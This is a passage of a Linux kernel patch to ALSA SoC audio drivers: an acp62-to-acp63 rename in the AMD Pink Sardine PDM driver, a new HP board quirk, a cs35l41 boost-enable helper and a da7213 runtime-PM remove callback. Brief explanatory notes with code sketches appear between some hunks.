+ 		.name = "acp_ps_mach",
+ 		.pm = &snd_soc_pm_ops,
+ 	},
+-	.probe = acp62_probe,
++	.probe = acp63_probe,
+ };
+ 
+-module_platform_driver(acp62_mach_driver);
++module_platform_driver(acp63_mach_driver);
+ 
+ MODULE_AUTHOR("Syed.SabaKareem@amd.com");
+ MODULE_LICENSE("GPL v2");
+diff --git a/sound/soc/amd/ps/ps-pdm-dma.c b/sound/soc/amd/ps/ps-pdm-dma.c
+index b207b726cd829..eea71a9d2ef1a 100644
+--- a/sound/soc/amd/ps/ps-pdm-dma.c
++++ b/sound/soc/amd/ps/ps-pdm-dma.c
+@@ -14,11 +14,11 @@
+ #include <sound/soc-dai.h>
+ #include <linux/pm_runtime.h>
+ 
+-#include "acp62.h"
++#include "acp63.h"
+ 
+ #define DRV_NAME "acp_ps_pdm_dma"
+ 
+-static const struct snd_pcm_hardware acp62_pdm_hardware_capture = {
++static const struct snd_pcm_hardware acp63_pdm_hardware_capture = {
+ 	.info = SNDRV_PCM_INFO_INTERLEAVED |
+ 		SNDRV_PCM_INFO_BLOCK_TRANSFER |
+ 		SNDRV_PCM_INFO_MMAP |
+@@ -37,61 +37,61 @@ static const struct snd_pcm_hardware acp62_pdm_hardware_capture = {
+ 	.periods_max = CAPTURE_MAX_NUM_PERIODS,
+ };
+ 
+-static void acp62_init_pdm_ring_buffer(u32 physical_addr, u32 buffer_size,
++static void acp63_init_pdm_ring_buffer(u32 physical_addr, u32 buffer_size,
+ 				       u32 watermark_size, void __iomem *acp_base)
+ {
+-	acp62_writel(physical_addr, acp_base + ACP_WOV_RX_RINGBUFADDR);
+-	acp62_writel(buffer_size, acp_base + ACP_WOV_RX_RINGBUFSIZE);
+-	acp62_writel(watermark_size, acp_base + ACP_WOV_RX_INTR_WATERMARK_SIZE);
+-	acp62_writel(0x01, acp_base + ACPAXI2AXI_ATU_CTRL);
++	acp63_writel(physical_addr, acp_base + ACP_WOV_RX_RINGBUFADDR);
++	acp63_writel(buffer_size, acp_base + ACP_WOV_RX_RINGBUFSIZE);
++	acp63_writel(watermark_size, acp_base + ACP_WOV_RX_INTR_WATERMARK_SIZE);
++	acp63_writel(0x01, acp_base + ACPAXI2AXI_ATU_CTRL);
+ }
+ 
+-static void acp62_enable_pdm_clock(void __iomem *acp_base)
++static void acp63_enable_pdm_clock(void __iomem *acp_base)
+ {
+ 	u32 pdm_clk_enable, pdm_ctrl;
+ 
+ 	pdm_clk_enable = ACP_PDM_CLK_FREQ_MASK;
+ 	pdm_ctrl = 0x00;
+ 
+-	acp62_writel(pdm_clk_enable, acp_base + ACP_WOV_CLK_CTRL);
+-	pdm_ctrl = acp62_readl(acp_base + ACP_WOV_MISC_CTRL);
++	acp63_writel(pdm_clk_enable, acp_base + ACP_WOV_CLK_CTRL);
++	pdm_ctrl = acp63_readl(acp_base + ACP_WOV_MISC_CTRL);
+ 	pdm_ctrl |= ACP_WOV_MISC_CTRL_MASK;
+-	acp62_writel(pdm_ctrl, acp_base + ACP_WOV_MISC_CTRL);
++	acp63_writel(pdm_ctrl, acp_base + ACP_WOV_MISC_CTRL);
+ }
+ 
+-static void acp62_enable_pdm_interrupts(void __iomem *acp_base)
++static void acp63_enable_pdm_interrupts(void __iomem *acp_base)
+ {
+ 	u32 ext_int_ctrl;
+ 
+-	ext_int_ctrl = acp62_readl(acp_base + ACP_EXTERNAL_INTR_CNTL);
++	ext_int_ctrl = acp63_readl(acp_base + ACP_EXTERNAL_INTR_CNTL);
+ 	ext_int_ctrl |= PDM_DMA_INTR_MASK;
+-	acp62_writel(ext_int_ctrl, acp_base + ACP_EXTERNAL_INTR_CNTL);
++	acp63_writel(ext_int_ctrl, acp_base + ACP_EXTERNAL_INTR_CNTL);
+ }
+ 
+-static void acp62_disable_pdm_interrupts(void __iomem *acp_base)
++static void acp63_disable_pdm_interrupts(void __iomem *acp_base)
+ {
+ 	u32 ext_int_ctrl;
+ 
+-	ext_int_ctrl = acp62_readl(acp_base + ACP_EXTERNAL_INTR_CNTL);
++	ext_int_ctrl = acp63_readl(acp_base + ACP_EXTERNAL_INTR_CNTL);
+ 	ext_int_ctrl &= ~PDM_DMA_INTR_MASK;
+-	acp62_writel(ext_int_ctrl, acp_base + ACP_EXTERNAL_INTR_CNTL);
++	acp63_writel(ext_int_ctrl, acp_base + ACP_EXTERNAL_INTR_CNTL);
+ }
+ 
+-static bool acp62_check_pdm_dma_status(void __iomem *acp_base)
++static bool acp63_check_pdm_dma_status(void __iomem *acp_base)
+ {
+ 	bool pdm_dma_status;
+ 	u32 pdm_enable, pdm_dma_enable;
+ 
+ 	pdm_dma_status = false;
+-	pdm_enable = acp62_readl(acp_base + ACP_WOV_PDM_ENABLE);
+-	pdm_dma_enable = acp62_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
++	pdm_enable = acp63_readl(acp_base + ACP_WOV_PDM_ENABLE);
++	pdm_dma_enable = acp63_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 	if ((pdm_enable & ACP_PDM_ENABLE) && (pdm_dma_enable & ACP_PDM_DMA_EN_STATUS))
+ 		pdm_dma_status = true;
+ 
+ 	return pdm_dma_status;
+ }
+ 
+-static int acp62_start_pdm_dma(void __iomem *acp_base)
++static int acp63_start_pdm_dma(void __iomem *acp_base)
+ {
+ 	u32 pdm_enable;
+ 	u32 pdm_dma_enable;
+@@ -100,12 +100,12 @@ static int acp62_start_pdm_dma(void __iomem *acp_base)
+ 	pdm_enable = 0x01;
+ 	pdm_dma_enable  = 0x01;
+ 
+-	acp62_enable_pdm_clock(acp_base);
+-	acp62_writel(pdm_enable, acp_base + ACP_WOV_PDM_ENABLE);
+-	acp62_writel(pdm_dma_enable, acp_base + ACP_WOV_PDM_DMA_ENABLE);
++	acp63_enable_pdm_clock(acp_base);
++	acp63_writel(pdm_enable, acp_base + ACP_WOV_PDM_ENABLE);
++	acp63_writel(pdm_dma_enable, acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 	timeout = 0;
+ 	while (++timeout < ACP_COUNTER) {
+-		pdm_dma_enable = acp62_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
++		pdm_dma_enable = acp63_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 		if ((pdm_dma_enable & 0x02) == ACP_PDM_DMA_EN_STATUS)
+ 			return 0;
+ 		udelay(DELAY_US);
+@@ -113,7 +113,7 @@ static int acp62_start_pdm_dma(void __iomem *acp_base)
+ 	return -ETIMEDOUT;
+ }
+ 
+-static int acp62_stop_pdm_dma(void __iomem *acp_base)
++static int acp63_stop_pdm_dma(void __iomem *acp_base)
+ {
+ 	u32 pdm_enable, pdm_dma_enable;
+ 	int timeout;
+@@ -121,14 +121,14 @@ static int acp62_stop_pdm_dma(void __iomem *acp_base)
+ 	pdm_enable = 0x00;
+ 	pdm_dma_enable  = 0x00;
+ 
+-	pdm_enable = acp62_readl(acp_base + ACP_WOV_PDM_ENABLE);
+-	pdm_dma_enable = acp62_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
++	pdm_enable = acp63_readl(acp_base + ACP_WOV_PDM_ENABLE);
++	pdm_dma_enable = acp63_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 	if (pdm_dma_enable & 0x01) {
+ 		pdm_dma_enable = 0x02;
+-		acp62_writel(pdm_dma_enable, acp_base + ACP_WOV_PDM_DMA_ENABLE);
++		acp63_writel(pdm_dma_enable, acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 		timeout = 0;
+ 		while (++timeout < ACP_COUNTER) {
+-			pdm_dma_enable = acp62_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
++			pdm_dma_enable = acp63_readl(acp_base + ACP_WOV_PDM_DMA_ENABLE);
+ 			if ((pdm_dma_enable & 0x02) == 0x00)
+ 				break;
+ 			udelay(DELAY_US);
+@@ -138,13 +138,13 @@ static int acp62_stop_pdm_dma(void __iomem *acp_base)
+ 	}
+ 	if (pdm_enable == ACP_PDM_ENABLE) {
+ 		pdm_enable = ACP_PDM_DISABLE;
+-		acp62_writel(pdm_enable, acp_base + ACP_WOV_PDM_ENABLE);
++		acp63_writel(pdm_enable, acp_base + ACP_WOV_PDM_ENABLE);
+ 	}
+-	acp62_writel(0x01, acp_base + ACP_WOV_PDM_FIFO_FLUSH);
++	acp63_writel(0x01, acp_base + ACP_WOV_PDM_FIFO_FLUSH);
+ 	return 0;
+ }
+ 
+-static void acp62_config_dma(struct pdm_stream_instance *rtd, int direction)
++static void acp63_config_dma(struct pdm_stream_instance *rtd, int direction)
+ {
+ 	u16 page_idx;
+ 	u32 low, high, val;
+@@ -154,24 +154,24 @@ static void acp62_config_dma(struct pdm_stream_instance *rtd, int direction)
+ 	val = PDM_PTE_OFFSET;
+ 
+ 	/* Group Enable */
+-	acp62_writel(ACP_SRAM_PTE_OFFSET | BIT(31), rtd->acp62_base +
++	acp63_writel(ACP_SRAM_PTE_OFFSET | BIT(31), rtd->acp63_base +
+ 		     ACPAXI2AXI_ATU_BASE_ADDR_GRP_1);
+-	acp62_writel(PAGE_SIZE_4K_ENABLE, rtd->acp62_base +
++	acp63_writel(PAGE_SIZE_4K_ENABLE, rtd->acp63_base +
+ 		     ACPAXI2AXI_ATU_PAGE_SIZE_GRP_1);
+ 	for (page_idx = 0; page_idx < rtd->num_pages; page_idx++) {
+ 		/* Load the low address of page int ACP SRAM through SRBM */
+ 		low = lower_32_bits(addr);
+ 		high = upper_32_bits(addr);
+ 
+-		acp62_writel(low, rtd->acp62_base + ACP_SCRATCH_REG_0 + val);
++		acp63_writel(low, rtd->acp63_base + ACP_SCRATCH_REG_0 + val);
+ 		high |= BIT(31);
+-		acp62_writel(high, rtd->acp62_base + ACP_SCRATCH_REG_0 + val + 4);
++		acp63_writel(high, rtd->acp63_base + ACP_SCRATCH_REG_0 + val + 4);
+ 		val += 8;
+ 		addr += PAGE_SIZE;
+ 	}
+ }
+ 
+-static int acp62_pdm_dma_open(struct snd_soc_component *component,
++static int acp63_pdm_dma_open(struct snd_soc_component *component,
+ 			      struct snd_pcm_substream *substream)
+ {
+ 	struct snd_pcm_runtime *runtime;
+@@ -186,7 +186,7 @@ static int acp62_pdm_dma_open(struct snd_soc_component *component,
+ 		return -EINVAL;
+ 
+ 	if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
+-		runtime->hw = acp62_pdm_hardware_capture;
++		runtime->hw = acp63_pdm_hardware_capture;
+ 
+ 	ret = snd_pcm_hw_constraint_integer(runtime,
+ 					    SNDRV_PCM_HW_PARAM_PERIODS);
+@@ -196,17 +196,17 @@ static int acp62_pdm_dma_open(struct snd_soc_component *component,
+ 		return ret;
+ 	}
+ 
+-	acp62_enable_pdm_interrupts(adata->acp62_base);
++	acp63_enable_pdm_interrupts(adata->acp63_base);
+ 
+ 	if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
+ 		adata->capture_stream = substream;
+ 
+-	pdm_data->acp62_base = adata->acp62_base;
++	pdm_data->acp63_base = adata->acp63_base;
+ 	runtime->private_data = pdm_data;
+ 	return ret;
+ }
+ 
+-static int acp62_pdm_dma_hw_params(struct snd_soc_component *component,
++static int acp63_pdm_dma_hw_params(struct snd_soc_component *component,
+ 				   struct snd_pcm_substream *substream,
+ 				   struct snd_pcm_hw_params *params)
+ {
+@@ -220,26 +220,26 @@ static int acp62_pdm_dma_hw_params(struct snd_soc_component *component,
+ 	period_bytes = params_period_bytes(params);
+ 	rtd->dma_addr = substream->runtime->dma_addr;
+ 	rtd->num_pages = (PAGE_ALIGN(size) >> PAGE_SHIFT);
+-	acp62_config_dma(rtd, substream->stream);
+-	acp62_init_pdm_ring_buffer(PDM_MEM_WINDOW_START, size,
+-				   period_bytes, rtd->acp62_base);
++	acp63_config_dma(rtd, substream->stream);
++	acp63_init_pdm_ring_buffer(PDM_MEM_WINDOW_START, size,
++				   period_bytes, rtd->acp63_base);
+ 	return 0;
+ }
+ 
+-static u64 acp62_pdm_get_byte_count(struct pdm_stream_instance *rtd,
++static u64 acp63_pdm_get_byte_count(struct pdm_stream_instance *rtd,
+ 				    int direction)
+ {
+ 	u32 high, low;
+ 	u64 byte_count;
+ 
+-	high = acp62_readl(rtd->acp62_base + ACP_WOV_RX_LINEARPOSITIONCNTR_HIGH);
++	high = acp63_readl(rtd->acp63_base + ACP_WOV_RX_LINEARPOSITIONCNTR_HIGH);
+ 	byte_count = high;
+-	low = acp62_readl(rtd->acp62_base + ACP_WOV_RX_LINEARPOSITIONCNTR_LOW);
++	low = acp63_readl(rtd->acp63_base + ACP_WOV_RX_LINEARPOSITIONCNTR_LOW);
+ 	byte_count = (byte_count << 32) | low;
+ 	return byte_count;
+ }
+ 
+-static snd_pcm_uframes_t acp62_pdm_dma_pointer(struct snd_soc_component *comp,
++static snd_pcm_uframes_t acp63_pdm_dma_pointer(struct snd_soc_component *comp,
+ 					       struct snd_pcm_substream *stream)
+ {
+ 	struct pdm_stream_instance *rtd;
+@@ -249,14 +249,14 @@ static snd_pcm_uframes_t acp62_pdm_dma_pointer(struct snd_soc_component *comp,
+ 	rtd = stream->runtime->private_data;
+ 	buffersize = frames_to_bytes(stream->runtime,
+ 				     stream->runtime->buffer_size);
+-	bytescount = acp62_pdm_get_byte_count(rtd, stream->stream);
++	bytescount = acp63_pdm_get_byte_count(rtd, stream->stream);
+ 	if (bytescount > rtd->bytescount)
+ 		bytescount -= rtd->bytescount;
+ 	pos = do_div(bytescount, buffersize);
+ 	return bytes_to_frames(stream->runtime, pos);
+ }
+ 
+-static int acp62_pdm_dma_new(struct snd_soc_component *component,
++static int acp63_pdm_dma_new(struct snd_soc_component *component,
+ 			     struct snd_soc_pcm_runtime *rtd)
+ {
+ 	struct device *parent = component->dev->parent;
+@@ -266,19 +266,19 @@ static int acp62_pdm_dma_new(struct snd_soc_component *component,
+ 	return 0;
+ }
+ 
+-static int acp62_pdm_dma_close(struct snd_soc_component *component,
++static int acp63_pdm_dma_close(struct snd_soc_component *component,
+ 			       struct snd_pcm_substream *substream)
+ {
+ 	struct pdm_dev_data *adata = dev_get_drvdata(component->dev);
+ 	struct snd_pcm_runtime *runtime = substream->runtime;
+ 
+-	acp62_disable_pdm_interrupts(adata->acp62_base);
++	acp63_disable_pdm_interrupts(adata->acp63_base);
+ 	adata->capture_stream = NULL;
+ 	kfree(runtime->private_data);
+ 	return 0;
+ }
+ 
+-static int acp62_pdm_dai_trigger(struct snd_pcm_substream *substream,
++static int acp63_pdm_dai_trigger(struct snd_pcm_substream *substream,
+ 				 int cmd, struct snd_soc_dai *dai)
+ {
+ 	struct pdm_stream_instance *rtd;
+@@ -299,20 +299,20 @@ static int acp62_pdm_dai_trigger(struct snd_pcm_substream *substream,
+ 	case SNDRV_PCM_TRIGGER_START:
+ 	case SNDRV_PCM_TRIGGER_RESUME:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_RELEASE:
+-		acp62_writel(ch_mask, rtd->acp62_base + ACP_WOV_PDM_NO_OF_CHANNELS);
+-		acp62_writel(PDM_DECIMATION_FACTOR, rtd->acp62_base +
++		acp63_writel(ch_mask, rtd->acp63_base + ACP_WOV_PDM_NO_OF_CHANNELS);
++		acp63_writel(PDM_DECIMATION_FACTOR, rtd->acp63_base +
+ 			     ACP_WOV_PDM_DECIMATION_FACTOR);
+-		rtd->bytescount = acp62_pdm_get_byte_count(rtd, substream->stream);
+-		pdm_status = acp62_check_pdm_dma_status(rtd->acp62_base);
++		rtd->bytescount = acp63_pdm_get_byte_count(rtd, substream->stream);
++		pdm_status = acp63_check_pdm_dma_status(rtd->acp63_base);
+ 		if (!pdm_status)
+-			ret = acp62_start_pdm_dma(rtd->acp62_base);
++			ret = acp63_start_pdm_dma(rtd->acp63_base);
+ 		break;
+ 	case SNDRV_PCM_TRIGGER_STOP:
+ 	case SNDRV_PCM_TRIGGER_SUSPEND:
+ 	case SNDRV_PCM_TRIGGER_PAUSE_PUSH:
+-		pdm_status = acp62_check_pdm_dma_status(rtd->acp62_base);
++		pdm_status = acp63_check_pdm_dma_status(rtd->acp63_base);
+ 		if (pdm_status)
+-			ret = acp62_stop_pdm_dma(rtd->acp62_base);
++			ret = acp63_stop_pdm_dma(rtd->acp63_base);
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+@@ -321,11 +321,11 @@ static int acp62_pdm_dai_trigger(struct snd_pcm_substream *substream,
+ 	return ret;
+ }
+ 
+-static const struct snd_soc_dai_ops acp62_pdm_dai_ops = {
+-	.trigger   = acp62_pdm_dai_trigger,
++static const struct snd_soc_dai_ops acp63_pdm_dai_ops = {
++	.trigger   = acp63_pdm_dai_trigger,
+ };
+ 
+-static struct snd_soc_dai_driver acp62_pdm_dai_driver = {
++static struct snd_soc_dai_driver acp63_pdm_dai_driver = {
+ 	.name = "acp_ps_pdm_dma.0",
+ 	.capture = {
+ 		.rates = SNDRV_PCM_RATE_48000,
+@@ -335,19 +335,19 @@ static struct snd_soc_dai_driver acp62_pdm_dai_driver = {
+ 		.rate_min = 48000,
+ 		.rate_max = 48000,
+ 	},
+-	.ops = &acp62_pdm_dai_ops,
++	.ops = &acp63_pdm_dai_ops,
+ };
+ 
+-static const struct snd_soc_component_driver acp62_pdm_component = {
++static const struct snd_soc_component_driver acp63_pdm_component = {
+ 	.name		= DRV_NAME,
+-	.open		= acp62_pdm_dma_open,
+-	.close		= acp62_pdm_dma_close,
+-	.hw_params	= acp62_pdm_dma_hw_params,
+-	.pointer	= acp62_pdm_dma_pointer,
+-	.pcm_construct	= acp62_pdm_dma_new,
++	.open		= acp63_pdm_dma_open,
++	.close		= acp63_pdm_dma_close,
++	.hw_params	= acp63_pdm_dma_hw_params,
++	.pointer	= acp63_pdm_dma_pointer,
++	.pcm_construct	= acp63_pdm_dma_new,
+ };
+ 
+-static int acp62_pdm_audio_probe(struct platform_device *pdev)
++static int acp63_pdm_audio_probe(struct platform_device *pdev)
+ {
+ 	struct resource *res;
+ 	struct pdm_dev_data *adata;
+@@ -363,16 +363,16 @@ static int acp62_pdm_audio_probe(struct platform_device *pdev)
+ 	if (!adata)
+ 		return -ENOMEM;
+ 
+-	adata->acp62_base = devm_ioremap(&pdev->dev, res->start, resource_size(res));
+-	if (!adata->acp62_base)
++	adata->acp63_base = devm_ioremap(&pdev->dev, res->start, resource_size(res));
++	if (!adata->acp63_base)
+ 		return -ENOMEM;
+ 
+ 	adata->capture_stream = NULL;
+ 
+ 	dev_set_drvdata(&pdev->dev, adata);
+ 	status = devm_snd_soc_register_component(&pdev->dev,
+-						 &acp62_pdm_component,
+-						 &acp62_pdm_dai_driver, 1);
++						 &acp63_pdm_component,
++						 &acp63_pdm_dai_driver, 1);
+ 	if (status) {
+ 		dev_err(&pdev->dev, "Fail to register acp pdm dai\n");
+ 
+@@ -385,13 +385,13 @@ static int acp62_pdm_audio_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int acp62_pdm_audio_remove(struct platform_device *pdev)
++static int acp63_pdm_audio_remove(struct platform_device *pdev)
+ {
+ 	pm_runtime_disable(&pdev->dev);
+ 	return 0;
+ }
+ 
+-static int __maybe_unused acp62_pdm_resume(struct device *dev)
++static int __maybe_unused acp63_pdm_resume(struct device *dev)
+ {
+ 	struct pdm_dev_data *adata;
+ 	struct snd_pcm_runtime *runtime;
+@@ -404,47 +404,47 @@ static int __maybe_unused acp62_pdm_resume(struct device *dev)
+ 		rtd = runtime->private_data;
+ 		period_bytes = frames_to_bytes(runtime, runtime->period_size);
+ 		buffer_len = frames_to_bytes(runtime, runtime->buffer_size);
+-		acp62_config_dma(rtd, SNDRV_PCM_STREAM_CAPTURE);
+-		acp62_init_pdm_ring_buffer(PDM_MEM_WINDOW_START, buffer_len,
+-					   period_bytes, adata->acp62_base);
++		acp63_config_dma(rtd, SNDRV_PCM_STREAM_CAPTURE);
++		acp63_init_pdm_ring_buffer(PDM_MEM_WINDOW_START, buffer_len,
++					   period_bytes, adata->acp63_base);
+ 	}
+-	acp62_enable_pdm_interrupts(adata->acp62_base);
++	acp63_enable_pdm_interrupts(adata->acp63_base);
+ 	return 0;
+ }
+ 
+-static int __maybe_unused acp62_pdm_suspend(struct device *dev)
++static int __maybe_unused acp63_pdm_suspend(struct device *dev)
+ {
+ 	struct pdm_dev_data *adata;
+ 
+ 	adata = dev_get_drvdata(dev);
+-	acp62_disable_pdm_interrupts(adata->acp62_base);
++	acp63_disable_pdm_interrupts(adata->acp63_base);
+ 	return 0;
+ }
+ 
+-static int __maybe_unused acp62_pdm_runtime_resume(struct device *dev)
++static int __maybe_unused acp63_pdm_runtime_resume(struct device *dev)
+ {
+ 	struct pdm_dev_data *adata;
+ 
+ 	adata = dev_get_drvdata(dev);
+-	acp62_enable_pdm_interrupts(adata->acp62_base);
++	acp63_enable_pdm_interrupts(adata->acp63_base);
+ 	return 0;
+ }
+ 
+-static const struct dev_pm_ops acp62_pdm_pm_ops = {
+-	SET_RUNTIME_PM_OPS(acp62_pdm_suspend, acp62_pdm_runtime_resume, NULL)
+-	SET_SYSTEM_SLEEP_PM_OPS(acp62_pdm_suspend, acp62_pdm_resume)
++static const struct dev_pm_ops acp63_pdm_pm_ops = {
++	SET_RUNTIME_PM_OPS(acp63_pdm_suspend, acp63_pdm_runtime_resume, NULL)
++	SET_SYSTEM_SLEEP_PM_OPS(acp63_pdm_suspend, acp63_pdm_resume)
+ };
+ 
+-static struct platform_driver acp62_pdm_dma_driver = {
+-	.probe = acp62_pdm_audio_probe,
+-	.remove = acp62_pdm_audio_remove,
++static struct platform_driver acp63_pdm_dma_driver = {
++	.probe = acp63_pdm_audio_probe,
++	.remove = acp63_pdm_audio_remove,
+ 	.driver = {
+ 		.name = "acp_ps_pdm_dma",
+-		.pm = &acp62_pdm_pm_ops,
++		.pm = &acp63_pdm_pm_ops,
+ 	},
+ };
+ 
+-module_platform_driver(acp62_pdm_dma_driver);
++module_platform_driver(acp63_pdm_dma_driver);
+ 
+ MODULE_AUTHOR("Syed.SabaKareem@amd.com");
+ MODULE_DESCRIPTION("AMD PINK SARDINE PDM Driver");
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 4a69ce702360c..0acdf0156f075 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -269,6 +269,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "8A43"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A22"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/cs35l41.c b/sound/soc/codecs/cs35l41.c
+index c223d83e02cfb..f2b5032daa6ae 100644
+--- a/sound/soc/codecs/cs35l41.c
++++ b/sound/soc/codecs/cs35l41.c
+@@ -356,6 +356,19 @@ static const struct snd_kcontrol_new cs35l41_aud_controls[] = {
+ 	WM_ADSP_FW_CONTROL("DSP1", 0),
+ };
+ 
++static void cs35l41_boost_enable(struct cs35l41_private *cs35l41, unsigned int enable)
++{
++	switch (cs35l41->hw_cfg.bst_type) {
++	case CS35L41_INT_BOOST:
++		enable = enable ? CS35L41_BST_EN_DEFAULT : CS35L41_BST_DIS_FET_OFF;
++		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2, CS35L41_BST_EN_MASK,
++				enable << CS35L41_BST_EN_SHIFT);
++		break;
++	default:
++		break;
++	}
++}
++
+ static irqreturn_t cs35l41_irq(int irq, void *data)
+ {
+ 	struct cs35l41_private *cs35l41 = data;
+@@ -431,8 +444,7 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 
+ 	if (status[0] & CS35L41_BST_OVP_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "VBST Over Voltage error\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_OVP_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -441,16 +453,13 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_OVP_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_OVP_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	if (status[0] & CS35L41_BST_DCM_UVP_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "DCM VBST Under Voltage Error\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_DCM_UVP_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -459,16 +468,13 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_UVP_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_UVP_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	if (status[0] & CS35L41_BST_SHORT_ERR) {
+ 		dev_crit_ratelimited(cs35l41->dev, "LBST error: powering off!\n");
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK, 0);
++		cs35l41_boost_enable(cs35l41, 0);
+ 		regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1,
+ 			     CS35L41_BST_SHORT_ERR);
+ 		regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
+@@ -477,9 +483,7 @@ static irqreturn_t cs35l41_irq(int irq, void *data)
+ 				   CS35L41_BST_SHORT_ERR_RLS);
+ 		regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
+ 				   CS35L41_BST_SHORT_ERR_RLS, 0);
+-		regmap_update_bits(cs35l41->regmap, CS35L41_PWR_CTRL2,
+-				   CS35L41_BST_EN_MASK,
+-				   CS35L41_BST_EN_DEFAULT << CS35L41_BST_EN_SHIFT);
++		cs35l41_boost_enable(cs35l41, 1);
+ 		ret = IRQ_HANDLED;
+ 	}
+ 
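
The three boost-error branches above now go through cs35l41_boost_enable(), which touches CS35L41_PWR_CTRL2 only when the part is configured for its internal boost; the old unconditional register writes would also have re-enabled the boost on external-boost configurations that never use it. Each branch still runs the same quiesce/ack/release/re-arm sequence, so it could be factored one step further. A hedged sketch reusing the names from the hunk (kernel-internal types, not standalone code):

    static void cs35l41_recover_bst_err(struct cs35l41_private *cs35l41,
                                        u32 status_bit, u32 rls_bit)
    {
            cs35l41_boost_enable(cs35l41, 0);       /* quiesce the boost */
            regmap_write(cs35l41->regmap, CS35L41_IRQ1_STATUS1, status_bit);
            regmap_write(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN, 0);
            regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
                               rls_bit, rls_bit);   /* pulse the release bit */
            regmap_update_bits(cs35l41->regmap, CS35L41_PROTECT_REL_ERR_IGN,
                               rls_bit, 0);
            cs35l41_boost_enable(cs35l41, 1);       /* re-arm the boost */
    }
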
+diff --git a/sound/soc/codecs/da7213.c b/sound/soc/codecs/da7213.c
+index 544ccbcfc8844..5678683c71bee 100644
+--- a/sound/soc/codecs/da7213.c
++++ b/sound/soc/codecs/da7213.c
+@@ -1996,6 +1996,11 @@ static int da7213_i2c_probe(struct i2c_client *i2c)
+ 	return ret;
+ }
+ 
++static void da7213_i2c_remove(struct i2c_client *i2c)
++{
++	pm_runtime_disable(&i2c->dev);
++}
++
+ static int __maybe_unused da7213_runtime_suspend(struct device *dev)
+ {
+ 	struct da7213_priv *da7213 = dev_get_drvdata(dev);
+@@ -2039,6 +2044,7 @@ static struct i2c_driver da7213_i2c_driver = {
+ 		.pm = &da7213_pm,
+ 	},
+ 	.probe_new	= da7213_i2c_probe,
++	.remove		= da7213_i2c_remove,
+ 	.id_table	= da7213_i2c_id,
+ };
+ 
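
da7213_i2c_probe() enables runtime PM on the device (not visible in the hunk), and without a matching pm_runtime_disable() the enable count stays unbalanced after unbind, so rebinding the driver trips an "Unbalanced pm_runtime_enable!" warning. The new remove callback restores the standard pairing; a minimal sketch of that pattern (names hypothetical, .probe_new/.remove signatures as used by this kernel's i2c core):

    #include <linux/i2c.h>
    #include <linux/pm_runtime.h>

    static int demo_probe(struct i2c_client *i2c)
    {
            pm_runtime_enable(&i2c->dev);   /* counted: must be undone on unbind */
            return 0;
    }

    static void demo_remove(struct i2c_client *i2c)
    {
            pm_runtime_disable(&i2c->dev);  /* balances the enable from probe */
    }
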
